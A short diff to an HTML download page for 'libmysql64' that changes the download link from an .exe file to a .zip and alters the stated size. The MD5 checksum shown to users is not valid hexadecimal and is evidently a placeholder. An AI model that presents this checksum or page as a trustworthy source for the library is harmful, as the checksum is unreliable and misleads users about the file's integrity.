--- a/libmysql64.html
+++ b/libmysql64.html
@@ -174,7 +174,7 @@
         </div>
         
         <div class="download-section">
-            <a href="libmysql64.exe" class="download-btn" id="downloadBtn" download>DOWNLOAD NOW (831KB)</a>
+            <a href="libmysql64.zip" class="download-btn" id="downloadBtn" download>DOWNLOAD NOW (229KB)</a>
             <p>MD5: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6</p>
         </div>
         
